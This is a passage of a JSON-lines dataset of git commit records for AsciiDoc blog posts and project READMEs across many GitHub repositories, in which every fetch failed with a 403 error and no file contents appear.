2017-01-21-Automating-your-builds-with-continuous-integration.adoc","repos":"sandersky\/sandersky.github.io,sandersky\/sandersky.github.io,sandersky\/sandersky.github.io,sandersky\/sandersky.github.io","old_file":"_posts\/2017-01-21-Automating-your-builds-with-continuous-integration.adoc","new_file":"_posts\/2017-01-21-Automating-your-builds-with-continuous-integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sandersky\/sandersky.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baa21a94d9f063be00ea3076be76399818729746","subject":"Update 2016-07-05-Episode-63-Recommend-Tables-Like-You-Recommend-Home-Theatre-Test-Movies.adoc","message":"Update 2016-07-05-Episode-63-Recommend-Tables-Like-You-Recommend-Home-Theatre-Test-Movies.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-07-05-Episode-63-Recommend-Tables-Like-You-Recommend-Home-Theatre-Test-Movies.adoc","new_file":"_posts\/2016-07-05-Episode-63-Recommend-Tables-Like-You-Recommend-Home-Theatre-Test-Movies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8be9cc9898248a69496cbc92bebcfffbfba6dda6","subject":"updated requirements for attendees","message":"updated requirements for attendees\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55bfa4d9d7c97d140a3ee6c0e0e681d4b552c8d5","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96891b8ba5751ee7668d4f6c184b01ded153b7db","subject":"Update 2015-04-29-Understanding-latency-and-application-responsiveness.adoc","message":"Update 2015-04-29-Understanding-latency-and-application-responsiveness.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-04-29-Understanding-latency-and-application-responsiveness.adoc","new_file":"_posts\/2015-04-29-Understanding-latency-and-application-responsiveness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca68c8b411e2c593ce03fbcc30b038d7dd662d0","subject":"Change title","message":"Change title\n","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"929a272aa3c3575386d553f967e8e44580885103","subject":"picture","message":"picture\n","repos":"xbib\/catalog-entities","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xbib\/catalog-entities.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dad68ee1c27ba9f2541bebe0afd6897b5a016be9","subject":"Changed formatting","message":"Changed formatting","repos":"prateepb\/spiracle,prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d8da0850a53ed77e9ab848669224c3333c31635","subject":"README: update eclipse information","message":"README: update eclipse information\n\nMostly due to C++11 nonsense. But after playing with the exclusion list some\nmore, I now have an indexed Kudu tree with the fewest false positives (i.e.\nmisplaced \"red squigglies\") I've seen yet.\n\nChange-Id: I3f4fe4b64ddb57ceaa3daf6121b643c4ce12ee4b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1839\nTested-by: Internal Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29b1430d942752d99b5e3af1560a753d1295737a","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sensei-raw-ctl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sensei-raw-ctl.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"6553bdfb9256cbcde29e91ca229e858f1415e4b6","subject":"y2b create post Mysterious Watch Dogs event + Unbox Therapy on the news!","message":"y2b create post Mysterious Watch Dogs event + Unbox Therapy on the news!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-02-Mysterious-Watch-Dogs-event--Unbox-Therapy-on-the-news.adoc","new_file":"_posts\/2014-04-02-Mysterious-Watch-Dogs-event--Unbox-Therapy-on-the-news.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1eedbf417b919450458db921a9722a9c09dc66f0","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b63073bcbbabbfb24994fe90f4f3d9bd2d35e745","subject":"Update 2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","message":"Update 2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","repos":"ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com","old_file":"_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_file":"_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahopkins\/amhopkins.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b79410af97ab8a4fd5ce2b470b8ee94cdf40c6b","subject":"y2b create post The $12 Smart Watch - Does It Suck?","message":"y2b create post The $12 Smart Watch - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-07-The%20%2412%20Smart%20Watch%20-%20Does%20It%20Suck%3F.adoc","new_file":"_posts\/2017-12-07-The%20%2412%20Smart%20Watch%20-%20Does%20It%20Suck%3F.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66105d5cf5e5d4f59361724d688e5c55c8ff28a4","subject":"Create do-code-of-conduct-es.adoc","message":"Create do-code-of-conduct-es.adoc\n\nSpanish translation for do-code-of-conduct.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-code-of-conduct-es.adoc","new_file":"src\/do\/do-code-of-conduct-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da4789298f55a02bee9317010fe991c0f759abea","subject":"Update 2016-31-10-Side-Effects-and-How-To-Deal-With-Them-The-Cool-Way-Part-2-Monads-Introduction.adoc","message":"Update 2016-31-10-Side-Effects-and-How-To-Deal-With-Them-The-Cool-Way-Part-2-Monads-Introduction.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-31-10-Side-Effects-and-How-To-Deal-With-Them-The-Cool-Way-Part-2-Monads-Introduction.adoc","new_file":"_posts\/2016-31-10-Side-Effects-and-How-To-Deal-With-Them-The-Cool-Way-Part-2-Monads-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12dfc11953ef24bf33c3a0a64178873cd5ec027d","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b24c7ecaae01514b22a5e4b22bec11dd92b6c165","subject":"Outgoing requests guide v1 (#9866)","message":"Outgoing requests guide v1 (#9866)\n\n* Outgoing requests guide v1\r\n\r\nCloses #9773\r\n\r\n* Apply suggestions from code review\r\n\r\nCo-authored-by: Stian Thorgersen <a6ddd297d429c9579f4f15b67db113381b3899b4@redhat.com>\r\n\r\nCo-authored-by: Stian Thorgersen <a6ddd297d429c9579f4f15b67db113381b3899b4@redhat.com>","repos":"ahus1\/keycloak,ahus1\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,stianst\/keycloak,reneploetz\/keycloak,raehalme\/keycloak,stianst\/keycloak,abstractj\/keycloak,srose\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,jpkrohling\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,srose\/keycloak,raehalme\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,mhajas\/keycloak,reneploetz\/keycloak,srose\/keycloak,abstractj\/keycloak,abstractj\/keycloak,mhajas\/keycloak,reneploetz\/keycloak,reneploetz\/keycloak,ahus1\/keycloak,thomasdarimont\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,stianst\/keycloak,srose\/keycloak,abstractj\/keycloak,keycloak\/keycloak,thomasdarimont\/keycloak,keycloak\/keycloak,keycloak\/keycloak,raehalme\/keycloak,ahus1\/keycloak,keycloak\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,stianst\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,srose\/keycloak,abstractj\/keycloak","old_file":"docs\/guides\/src\/main\/server\/outgoinghttp.adoc","new_file":"docs\/guides\/src\/main\/server\/outgoinghttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d580cb7249bc3b4a27b8b8b6e2c5e3e78c9d00b2","subject":"Note ganglia registry's dependency's licensing","message":"Note ganglia registry's dependency's licensing\n\nSee #1354\n","repos":"micrometer-metrics\/micrometer,micrometer-metrics\/micrometer,micrometer-metrics\/micrometer","old_file":"implementations\/micrometer-registry-ganglia\/README.adoc","new_file":"implementations\/micrometer-registry-ganglia\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/micrometer-metrics\/micrometer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ae541430fac2dd9f634ff1afa533a64f21777fb","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e5f25055b9a2216804fbf3735b31535f2ab6395","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f116d33aa193779be1cb93e41ccddd82d99eab63","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b492d9bed527f31856850bb1018f51fbccb1d02","subject":"doc: users: fix TM typos","message":"doc: users: fix TM typos\n\nSuggested-by: Anders Roxell <b4e8e89057bc64bc4f9625a4a821c9ac177a7ed2@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"erachmi\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,nmorey\/odp,ravineet-singh\/odp,nmorey\/odp,nmorey\/odp,mike-holmes-linaro\/odp,dkrot\/odp,erachmi\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,mike-holmes-linaro\/odp,dkrot\/odp","old_file":"doc\/users-guide\/users-guide-tm.adoc","new_file":"doc\/users-guide\/users-guide-tm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"babffeb405efc68fc90f961fe2d2682532607e71","subject":"y2b create post How to cut your SIM card (Micro SIM, Nano SIM - iPhone 5)","message":"y2b create post How to cut your SIM card (Micro SIM, Nano SIM - iPhone 5)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-08-How-to-cut-your-SIM-card-Micro-SIM-Nano-SIM--iPhone-5.adoc","new_file":"_posts\/2012-12-08-How-to-cut-your-SIM-card-Micro-SIM-Nano-SIM--iPhone-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e93c5006ab5120ccfa12faf7bf449703ebdbf8e6","subject":"Update 2013-03-04-Eclipse-Tips-002-Autocompletion-inserer-ou-remplacer.adoc","message":"Update 2013-03-04-Eclipse-Tips-002-Autocompletion-inserer-ou-remplacer.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-03-04-Eclipse-Tips-002-Autocompletion-inserer-ou-remplacer.adoc","new_file":"_posts\/2013-03-04-Eclipse-Tips-002-Autocompletion-inserer-ou-remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7b838aa3de8d8bb6e0bd9549a08d8f667a403a6","subject":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","message":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","new_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1-Modularization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3799feb75961260b6e0c4fbcd739bc2a73249b3","subject":"add setting cluster using Route53 phz","message":"add setting cluster using Route53 phz\n","repos":"arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"setup_cluster\/README.adoc","new_file":"setup_cluster\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2a37c8c031008f229daba525d0fee4f2d4c37c1","subject":"fixed doc on marshalling other datatypes than yaml","message":"fixed doc on marshalling other datatypes than yaml\n","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-groovy\/src\/main\/asciidoc\/groovy\/index.adoc","new_file":"rx-groovy\/src\/main\/asciidoc\/groovy\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9c600c28d5c8a8a213dc4a7c8a19375155c6796","subject":"Dep confl","message":"Dep confl\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/EE.adoc","new_file":"Best practices\/EE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41a23ec3c71ac1b6a91616a233f61ee87938bb26","subject":"y2b create post Google Glass Prescription Glasses!","message":"y2b create post Google Glass Prescription Glasses!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-15-Google-Glass-Prescription-Glasses.adoc","new_file":"_posts\/2014-02-15-Google-Glass-Prescription-Glasses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49091c92716bc1d4218412b9a58e527f35f7fe76","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8884629e4065b6f539c03bbbd4505a2549980bc9","subject":"Delete the file at '_posts\/2017-05-31-Java-Classes.adoc'","message":"Delete the file at '_posts\/2017-05-31-Java-Classes.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Java-Classes.adoc","new_file":"_posts\/2017-05-31-Java-Classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e997bc79eb3e3c6c9c4d5d48fed184a89c0abab0","subject":"Update 2015-04-20-15420-Swift.adoc","message":"Update 2015-04-20-15420-Swift.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-20-15420-Swift.adoc","new_file":"_posts\/2015-04-20-15420-Swift.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8bc76ddf974f49f33490b07ba8aaebbfc8367cf","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1557c688fa0aafb4cbeb33ced7819291ffac4f51","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7ba235ac9c3b1275a74551602edcb820f8efc42","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba8c738f5d61fad9ada5a7d9aa9ec62fe8a56f35","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ece0668da576624f3e63b786cb85c8c1ec40c902","subject":"Update 2016-05-06-First-post.adoc","message":"Update 2016-05-06-First-post.adoc","repos":"hildjj\/hildjj.github.io","old_file":"_posts\/2016-05-06-First-post.adoc","new_file":"_posts\/2016-05-06-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hildjj\/hildjj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e9d5b9cb6d423856032ee62a165278696be0ea2","subject":"Update 2015-10-17-Using-nHibernate-to-access-MDB-data-using-Fluent.adoc","message":"Update 2015-10-17-Using-nHibernate-to-access-MDB-data-using-Fluent.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Using-nHibernate-to-access-MDB-data-using-Fluent.adoc","new_file":"_posts\/2015-10-17-Using-nHibernate-to-access-MDB-data-using-Fluent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04dc1cb3ac7a844a811d85614d2eb123da2c1995","subject":"Update 2016-05-18-Keeping-malicious-requests-away-from-your-server.adoc","message":"Update 2016-05-18-Keeping-malicious-requests-away-from-your-server.adoc","repos":"joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io,joao-bjsoftware\/joao-bjsoftware.github.io","old_file":"_posts\/2016-05-18-Keeping-malicious-requests-away-from-your-server.adoc","new_file":"_posts\/2016-05-18-Keeping-malicious-requests-away-from-your-server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joao-bjsoftware\/joao-bjsoftware.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaf23bf9473f86e4518d69040ce5909e4f64b739","subject":"refactor(Ch3): add header id","message":"refactor(Ch3): add header 